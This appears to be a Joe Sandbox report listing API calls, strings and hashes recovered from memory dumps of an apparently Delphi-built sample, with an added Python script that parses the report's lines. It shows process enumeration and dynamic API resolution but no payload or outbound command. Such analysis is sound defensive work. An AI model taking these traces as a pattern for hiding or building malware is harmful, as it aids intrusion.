                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 667068680-597814768
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 1c5e8962ab034a86bc23bfdd683a8090cee0c40ad886fbff6c826cf854715b3a
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 83fcdad62c6e1a8af3c887400f622032073ec0c7018a62236fb39f5e03547761
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c5e8962ab034a86bc23bfdd683a8090cee0c40ad886fbff6c826cf854715b3a
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9331EAF0A80350AFFF80EBB4E8C5B2977A9AB15701B100D65AA12CF354F678AC18DF15
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5925
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02CF593C
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?), ref: 02CF596C
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF59D0
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A06
                                                                                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A19
                                                                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A2B
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000,02D1E790), ref: 02CF5A37
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14,02CF0000), ref: 02CF5A6B
                                                                                                                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02CF6C14), ref: 02CF5A77
                                                                                                                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02CF5A99
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 3245196872-1565342463
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02CF5BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02CF5BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02CF5BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02CF5C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02CF5CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02CF5CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02CF5CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02CF5CEB
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
APIs
• GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02CF7FF5
Similarity
• API ID: DiskFreeSpace
• String ID:
• API String ID: 1705453755-0
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
• GetVersionExA.KERNEL32(?,02D1D106,00000000,02D1D11E), ref: 02CFB79A
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Version
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1889659487-0
APIs
• GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02CFBE72,00000000,02CFC08B,?,?,00000000,00000000), ref: 02CFA823
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
APIs
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02CFD29D
  • Part of subcall function 02CFD268: GetProcAddress.KERNEL32(00000000), ref: 02CFD281
Strings
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-1918263038
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: b029adf3afc6ca6f0c0d0a32647d932cd36c9bdb2e09bdc8d17b2753319465a2
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: daa9587550f3f25c83829731cf0fcf8c17a61522a4a25eea43b9f60fa0b8fde4
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b029adf3afc6ca6f0c0d0a32647d932cd36c9bdb2e09bdc8d17b2753319465a2
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 214132E1A8834C5BE2C4AB6D7400427FBEED354B103A0891AF716CB780FD34FC45AA69
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02D06EDE
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02D06EEF
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02D06EFF
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02D06F0F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02D06F1F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02D06F2F
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02D06F3F
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                      • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 667068680-2233174745
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 68cd35f4561d48982224dbfb03e411aea0a6290bb39197ef4bbdbc1144a5cc64
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 9b9b1a53bfe9a6be08357c62d971beaeea0763b0949aff6a980a1af15c29eed5
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68cd35f4561d48982224dbfb03e411aea0a6290bb39197ef4bbdbc1144a5cc64
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9BF04CE0A8D3407DBBC0BB716CC19262F9DA5606047201C15BE1355BD2EAB5DC39DF50
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02CF28CE
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: Message
                                                                                                                                                                                                                                                                                                                                                      • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 2030045667-32948583
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 9cac439da48419655c9e423ddac02e799a5258c90016dc2264be02495df4e623
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: fa21e702935ba375305c84a5a3b1cf43edf62aaabb84872c839bf5ca01149483
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cac439da48419655c9e423ddac02e799a5258c90016dc2264be02495df4e623
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFA10570A042948BDFE1AA2CCC80BD8B7E5EB49350F1440E5DE49AB385CB759EC5CF52
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      • bytes: , xrefs: 02CF275D
                                                                                                                                                                                                                                                                                                                                                      • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02CF2849
                                                                                                                                                                                                                                                                                                                                                      • Unexpected Memory Leak, xrefs: 02CF28C0
                                                                                                                                                                                                                                                                                                                                                      • 7, xrefs: 02CF26A1
                                                                                                                                                                                                                                                                                                                                                      • , xrefs: 02CF2814
                                                                                                                                                                                                                                                                                                                                                      • An unexpected memory leak has occurred. , xrefs: 02CF2690
                                                                                                                                                                                                                                                                                                                                                      • The unexpected small block leaks are:, xrefs: 02CF2707
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: b7b53fdf2b7be08f7bb61c3c9df076460980d877b2d46f4e94a3a1f09a3c5eee
• Instruction ID: e20b8b968aa666d450f68da56588360eaea200f2fba72313318d6405b3dc0d9a
• Opcode Fuzzy Hash: b7b53fdf2b7be08f7bb61c3c9df076460980d877b2d46f4e94a3a1f09a3c5eee
• Instruction Fuzzy Hash: 0E71D330A042988FDBE19A2CCC84BD9BBF5EF49304F1040E5DA49DB281DB758AC5CF52
APIs
• GetThreadLocale.KERNEL32(00000000,02CFC08B,?,?,00000000,00000000), ref: 02CFBDF6
  • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 85b7ffe8ca38c52753595f5cf9cb18f56a72eb8e2cb300ebec5f6f3e49569c3e
• Instruction ID: 0927d22ab9a9965955f57eb24482cbdea8838ac2723079aff2d7065c43c20897
• Opcode Fuzzy Hash: 85b7ffe8ca38c52753595f5cf9cb18f56a72eb8e2cb300ebec5f6f3e49569c3e
• Instruction Fuzzy Hash: 54615474B0014C5BDBC4EBA4D850A9FB7BBDB88300F509436E3019B745EA39DE1AAF95
APIs
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0B000
• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02D0B017
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0B0AB
• IsBadReadPtr.KERNEL32(?,00000002), ref: 02D0B0B7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02D0B0CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: Read$HandleModule
• String ID: KernelBase$LoadLibraryExA
• API String ID: 2226866862-113032527
• Opcode ID: eb905b252b1babc66ecff22e09fcb2bbc91557c7c176448a924e5b0af9dd5216
• Instruction ID: ea3dd600d6306d7bcd130fbae488f59da6896acad3e8990c73df835744318a98
• Opcode Fuzzy Hash: eb905b252b1babc66ecff22e09fcb2bbc91557c7c176448a924e5b0af9dd5216
• Instruction Fuzzy Hash: 91317071A44305BBEB60DB69CCC5F6977A8AF06358F104511EA24EB3E1D370ED00DB64
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8,?,?,02D1E7A8,02CF65B1,02D1D30D), ref: 02CF4395
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8,?,?,02D1E7A8,02CF65B1,02D1D30D), ref: 02CF439B
• GetStdHandle.KERNEL32(000000F5,02CF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?,02D767C8), ref: 02CF43B0
• WriteFile.KERNEL32(00000000,000000F5,02CF43E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02CF4423,?,?), ref: 02CF43B6
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02CF43D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 7d3f3ff4b70d131347bb936bd6aea8d230ac2779088dcd1993cb736cf87aa468
• Instruction ID: ae54f8598b1e4db582898272b267b5caa824879ae4d0a73e27befadee5f8657e
• Opcode Fuzzy Hash: 7d3f3ff4b70d131347bb936bd6aea8d230ac2779088dcd1993cb736cf87aa468
• Instruction Fuzzy Hash: 70F02B61AC4300B4F6E5A2607C05F5A236C0B44F11F548604B718942C0D7E888DC9711
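The function blocks above share one textual layout: an "APIs" list of `Func.MODULE(args), ref: ADDR` lines (subcall lines carry the parent function's start address) and a "Memory Dump Source" whose `.sdmp` file name encodes the dumped region. The Python below is an added example, not part of this Joe Sandbox report and not Joe Sandbox code: it parses those two line kinds so the string-bearing calls (here `KernelBase`, `LoadLibraryExA`, `Runtime error at 00000000`) can be pulled out for a pivot into the dump in IDA. The sample lines are copied from the listing above. The `.sdmp` field layout (process index, dump stage, dump id, base address, page protection, allocation state, allocation type, reserved) is my assumption from the names on this page; the constants used to decode the last three fields are the documented Windows `MEMORY_BASIC_INFORMATION` values.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# One "APIs" line, with or without the "Part of subcall function XXXX:" prefix.
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX_ONLY = re.compile(r"[0-9A-Fa-f]+")

# Documented Windows memory constants used to decode the dump-file name fields.
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}


@dataclass
class ApiCall:
    func: str
    module: str
    args: List[str]
    ref: int                      # address of the call site
    parent: Optional[int] = None  # start of the subcall function, if the line was nested


@dataclass
class DumpRegion:
    base: int
    protect: str
    state: str
    kind: str


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one report line; returns None for headers such as 'Strings'."""
    text = line.strip().lstrip("•").strip()
    m = API_LINE.match(text)
    if not m:
        return None
    args = m.group("args").split(",") if m.group("args") else []
    parent = int(m.group("parent"), 16) if m.group("parent") else None
    return ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16), parent)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Decode an .sdmp file name. ASSUMED field order (not documented on the page):
    procidx.stage.dumpid.base.protect.state.type.reserved.sdmp"""
    parts = name.strip().removesuffix(".sdmp").split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name!r}")
    base, protect, state, kind = (int(p, 16) for p in parts[3:7])
    # Mask off PAGE_GUARD / PAGE_NOCACHE modifier bits before the lookup.
    return DumpRegion(base,
                      PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
                      MEM_STATE.get(state, hex(state)),
                      MEM_TYPE.get(kind, hex(kind)))


def string_args(calls: List[ApiCall]) -> List[str]:
    """Arguments that are neither '?' nor a bare hex value, i.e. literal strings
    worth searching for in the dump. A purely hex-looking literal such as 'CAFE'
    would be filtered out by this heuristic."""
    seen = set()
    for c in calls:
        for a in c.args:
            a = a.strip()
            if a and a != "?" and not HEX_ONLY.fullmatch(a):
                seen.add(a)
    return sorted(seen)


# Sample input copied from the report listing above (constructed test data).
SAMPLE_API_LINES = [
    "• IsBadReadPtr.KERNEL32(?,00000004), ref: 02D0B000",
    "• GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02D0B017",
    "  • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2",
    "• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02CF43D4",
    "Strings",
]
SAMPLE_SDMP = "00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp"


def parse_block(lines: List[str]) -> List[ApiCall]:
    return [c for c in (parse_api_line(l) for l in lines) if c is not None]


if __name__ == "__main__":
    calls = parse_block(SAMPLE_API_LINES)
    for c in calls:
        nest = f" (in sub_{c.parent:08X})" if c.parent else ""
        print(f"{c.ref:08X} {c.module}!{c.func}{nest}")
    print("strings to pivot on:", string_args(calls))
    print("dump region:", parse_sdmp_name(SAMPLE_SDMP))
```

`parse_sdmp_name` turns the source-file name into the base address and the decoded protection/state/type, so the "Associated" dumps with the same base can be lined up by protection as the report lists them; `string_args` gives the literal arguments to search for once the snapshot is open in IDA.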
APIs
  • Part of subcall function 02CFAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
  • Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
  • Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
  • Part of subcall function 02CFAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
• CharToOemA.USER32(?,?), ref: 02CFAEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF1E
• GetStdHandle.KERNEL32(000000F4,02CFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF33
• WriteFile.KERNEL32(00000000,000000F4,02CFAF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF39
                                                                                                                                                                                                                                                                                                                                                      • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02CFAF5B
                                                                                                                                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CFAF71
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
